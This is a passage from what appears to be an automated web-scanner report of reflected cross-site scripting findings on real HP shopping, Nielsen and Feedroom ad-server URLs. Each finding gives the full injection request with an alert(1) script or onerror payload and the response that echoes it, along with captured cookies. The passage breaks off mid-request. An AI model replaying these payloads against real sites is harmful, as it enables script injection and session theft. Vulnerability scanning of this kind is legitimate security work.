Unable to find /HPShopping/is{HPShopping/qb911av_main}1b9f8<img src=a onerror=alert(1)>16f60277da7

1.6. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$mon parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $mon request parameter is copied into the HTML document as plain text between tags. The payload 3b1c6<img%20src%3da%20onerror%3dalert(1)>7933f9bb270 was submitted in the $mon parameter. This input was echoed as 3b1c6<img src=a onerror=alert(1)>7933f9bb270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D3b1c6<img%20src%3da%20onerror%3dalert(1)>7933f9bb270&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:57 GMT
Date: Thu, 22 Sep 2011 00:54:57 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/}3b1c6<img src=a onerror=alert(1)>7933f9bb270

1.7. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 249fa<img%20src%3da%20onerror%3dalert(1)>3b411bd2011 was submitted in the REST URL parameter 5. This input was echoed as 249fa<img src=a onerror=alert(1)>3b411bd2011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile249fa<img%20src%3da%20onerror%3dalert(1)>3b411bd2011?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 82
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:55:00 GMT
Date: Thu, 22 Sep 2011 00:55:00 GMT
Connection: close

Unable to find /HPShopping/promo3_tile249fa<img src=a onerror=alert(1)>3b411bd2011

1.8. http://nielsen.com/content/corporate/us/en/search.html [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search.html

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57279"><script>alert(1)</script>89e6489bffd was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/corporate/us/en/search.html?q=mobile+tv+internet57279"><script>alert(1)</script>89e6489bffd HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 55637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...
<input class="serform" size="41" maxlength="2048" name="q" id="query" value="mobile tv internet57279"><script>alert(1)</script>89e6489bffd" />
...[SNIP]...

1.9. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html [caller parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search/_jcr_content/par.autocomp.html

Issue detail

The value of the caller request parameter is copied into the HTML document as plain text between tags. The payload cdce6<script>alert(1)</script>2204e516bb2 was submitted in the caller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/corporate/us/en/search/_jcr_content/par.autocomp.html?q=mobile%20t&caller=queryheadcdce6<script>alert(1)</script>2204e516bb2 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 426

<div class="search section">


{[Top U.S. Markets for Mobile
, to Acquire Telephia, Inc., The
, to Measure The Mobile Media
, Mobile And Mediamark Research &amp;
, TV, Internet and Mobile Usage
, Mobile @Plan, Extending its Online
, Tweens Own a Mobile Phone,
, to Launch Mobile Advertising Measurement
, Mobile Youth Around the World
, the Mobile Web
, Close----queryheadcdce6<script>alert(1)</script>2204e516bb2]}
</div>
...[SNIP]...

1.10. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284d4"><script>alert(1)</script>40c00f65fef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com284d4"><script>alert(1)</script>40c00f65fef/hpscaleshare/personalcomputingadvancements/10006@x16?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 384
Content-Type: text/html
Cache-Control: private
Content-Length: 384

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com284d4"><script>alert(1)</script>40c00f65fef/hpscaleshare/personalcomputingadvancements/934644348/x16/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.11. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 564a6<script>alert(1)</script>d72fa664855 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare564a6<script>alert(1)</script>d72fa664855/personalcomputingadvancements/10006@x16?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 403
Content-Type: text/html
Cache-Control: private
Content-Length: 403

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare564a6<script>alert(1)</script>d72fa664855/personalcomputingadvancements/L13/987423938/x16/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.12. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 49930<script>alert(1)</script>4f0b168c0b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements49930<script>alert(1)</script>4f0b168c0b8/10006@x16?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 403
Content-Type: text/html
Cache-Control: private
Content-Length: 403

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements49930<script>alert(1)</script>4f0b168c0b8/L13/946458061/x16/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.13. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 371f1"><script>alert(1)</script>2baacc6de57 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16371f1"><script>alert(1)</script>2baacc6de57?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 377
Content-Type: text/html
Cache-Control: private
Content-Length: 377

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/1475599205/x16371f1"><script>alert(1)</script>2baacc6de57/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.14. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10650"><script>alert(1)</script>239ec9e22a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com10650"><script>alert(1)</script>239ec9e22a5/hpscaleshare/personalcomputingadvancements/10098@x45?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 384
Content-Type: text/html
Cache-Control: private
Content-Length: 384

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com10650"><script>alert(1)</script>239ec9e22a5/hpscaleshare/personalcomputingadvancements/780061163/x45/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.15. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2d577<script>alert(1)</script>1dc2957ae9a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare2d577<script>alert(1)</script>1dc2957ae9a/personalcomputingadvancements/10098@x45?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 404
Content-Type: text/html
Cache-Control: private
Content-Length: 404

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare2d577<script>alert(1)</script>1dc2957ae9a/personalcomputingadvancements/L13/1584850811/x45/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.16. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 17382<script>alert(1)</script>e47d32790fd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements17382<script>alert(1)</script>e47d32790fd/10098@x45?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 403
Content-Type: text/html
Cache-Control: private
Content-Length: 403

<ad
iid="%%sitetype%%.swf"
vid="9b46a88940038711a12386f1ca121aeef7a40ce3"
postroll="false"
showad="false"
clicktag="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements17382<script>alert(1)</script>e47d32790fd/L13/511424165/x45/Feedroom/default_instream/default_xml_instream.html/4d686437616b3536694b6f41424c3166"
>
...[SNIP]...

1.17. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.feedroom.com
Path:   /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abbb"><script>alert(1)</script>df0488ef607 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x454abbb"><script>alert(1)</script>df0488ef607?uid=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7 HTTP/1.1
Host: oascentral.feedroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
